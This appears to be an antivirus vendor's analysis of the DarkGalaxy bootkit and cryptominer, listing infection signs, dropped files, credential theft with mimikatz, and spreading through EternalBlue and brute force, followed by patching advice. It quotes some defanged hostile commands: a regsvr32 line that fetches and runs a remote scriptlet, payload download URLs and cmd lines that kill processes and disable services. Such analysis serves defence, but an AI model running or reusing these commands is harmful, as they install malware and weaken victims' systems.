Rootkit.Win32.DarkGalaxy.a

General Explanation

Type: Rootkit

Degree of destruction: high

Prevalence: average

Used vulnerabilities: Bruteforce, EternalBlue

What is Rootkit?

Rootkits harmfully affect the function of the OS kernel. These changes can hide the main activities of files, processes, Windows internal services, etc., and also malware may connect to the remote server and attempts to update its files without the user’s notice. The main activities of Rootkits are changing the system MBR and creating malicious drivers or changing the way healthy drivers perform.

What is Darkgalaxy malware?

This malware which entered the market aimed to extract cryptocurrency attempted malicious activities on the victim’s system and network by downloading and using different tools. One of the most important activities of this malware is to download new versions and updates the main files of malware, steal information, extract cryptocurrency, change DNS, and execute Mirai Botnet on the victim’s network. This malware affects IoT tools in addition to clients.

Technical Explanation

The Darkgalaxy is a miner and is a type of bootkit that adds its malicious codes in the MBR section and as a result, the initial agent of malware codes will be executed before the boot and operation of the OS. Also, it results in downloading and executing some malicious files by creating two WMIObjects.

Signs of infection

  • Execution of Ismm.exe which is used for mining
  • The existence of job files with the names of Mysa1, Mysa2, etc in %Windir%\System32\Tasks
  • Existence of two WMIObjects named youmm4**** and youmm3**** in root\cimv2 and root\subscription paths.
  • Existence of the following value in the run registry paths:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start
    • HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\start
    • Data: regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll

Explaining the function of the main file of the malware:

With analyzing created WMI objects by the malware, the releasing and execution procedure of it is specified. Initially, the malware attempts to download its main files by connecting to specified domains.

  • hxxp://173.247.239.186/ok.exe
  • hxxp://173.247.239.186/upsupx.exe
  • hxxp://173.247.239.186/u.exe

These domains change once in a while.

Max.exe or ok.exe file:

Responsible for changing the victim’s system MBR disk.

upsupx.exe file:

It downloads a file named xpdown.dat. The content of this file is the download address of the bitcoin file of the malware.

U.exe file:

It causes the System DNS to change to two numbers 233.5.5.5 for the preferred DNS server and 8.8.8.8 for the alternate DNS server.

Name and the path of the malicious file Function
%Windir%\system\downs.exe changing the file access permission of the desired malware in the system
%Windir%\system\cab.exe Malware update file
%Windir%\inf\msief.exe Mirai botnet executioner
%Windir%\debug\item.dat Malware service
%Windir%\system\my1.bat up.txt file downloader

After downloading the above files, according to its wmi code, the malware attempts to stop the processes of other Miner malware in the system such as Noutrino, Bitminer, etc to easily execute its malicious actions in the system. It removes the processes of svchost.exe, wininit.exe,csrss.exe, WUDFHosts.exe, services.exe, and taskhost.exe files via wmi, which are in a path other than the main path.

Also,  to update, it will remove the signs of infection which are created by previous versions. This malware will also stop AnyDesk services (the service Anydesk remote application).

With regards that the name of the miner file of the malware created in the victim’s system as ismosee.exe, it will remove all existing paths and files in the  %Windir%\debug\lsmosee.exe and  %Windir%\help\lsmosee.exe paths to replace their new version with the old version.

It will remove jobs such as WindowsUpdate1, WindowsUpdate3, Windows_Update, Update, Update2, Update3, window unit, System Security Check, AdobeFlashPlayer, etc.

To prevent the system from being infected with other malware and prevent any interference in mining, the malware will close used ports for transferring files such as Ports 445 and 139, then attempts to define a new policy for IPsec named win. So, only the person it desires can connect with this system.

After checking the files, these filters in the XP OS will not be applied. In the following, it will disable SMBDeviceEnabled by the registry.

up.txt file:

This file by PowerShell codes will collect system information which includes: public IP, local IP, the usage of processes, file path and command line of the running processes, the type of the OS and its version, Hard Disk capacity, and system username. domain and password of the system with the mimikatz application and store them in a file and send it to the malware server.

msief.exe file:

  • Mirai botnet executioner
  • disabling special services
    • %Windir%\system32\cmd.exe /c taskkill /f /im CSRS.exe&sc stop netprofm&sc config netprofm
    • start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  • creating a service name: xWinWpdSrv
  • Using the masscan tool  to check ports 445, 80 and 8000
  • releasing malware via brute force

The malware also by using csrc.exe attempts to execute EternalBlue vulnerability on other clients and creates a backdoor on them.

How to deal with it and disinfect the system

Padvish antivirus will detect this malware and remove it from the system. To prevent probable infections by malware that uses EternalBlue vulnerability, it is recommended to use the security patch used by Microsoft ms17-010. The IPS section of Padvish antivirus will detect vulnerabilities and prevent them from entering on victim’s system.

  0 people found this article useful

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>